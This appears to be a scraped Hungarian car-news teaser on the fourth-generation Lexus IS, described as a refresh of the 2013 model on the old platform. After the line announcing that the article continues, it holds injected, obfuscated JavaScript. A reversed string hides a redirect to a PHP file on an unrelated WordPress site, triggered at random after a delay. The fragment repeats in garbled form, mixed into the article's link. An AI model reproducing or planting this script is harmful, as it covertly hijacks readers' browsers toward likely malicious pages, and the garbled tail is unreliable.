Öreg már a Lexus legkisebb hátsókerék-hajtású típusa. A harmadik generációs IS-t 2013-ban mutatták be, így ideje volt a modellváltásnak. Igen ám, de az új TNGA padlólemezcsaládon belül nincs mód hátsókerék-hajtású, középkategóriás modell fejlesztésére – a GA-N padló elvileg alkalmas volna, de ehhez több mint 25 centiméterrel meg kellene kurtítani, amire vagy lehetőség, vagy idő nem állt rendelkezésre. Mindenesetre így esett, hogy az új, negyedik generációs IS valójában műszakilag megegyezik az előzővel – tehát tulajdonképpen inkább modellfrissítésről, mint -váltásról beszélhetünk. A régi-új Lexus IS a világ negyven országában lesz elérhető az ősz vége felé, Észak-Amerikában és Ázsiában széles körben forgalmazzák, Európa…
A cikk folytatódik: $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokalauz.co.hu/nap-kepe-videoja/2020/06/21/lexus-is-2021.html" target="_blank">http://autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokalauz.co.hu/nap-kepe-videoja/2020/06/21/lexus-is-2021.html
- Hirdetés -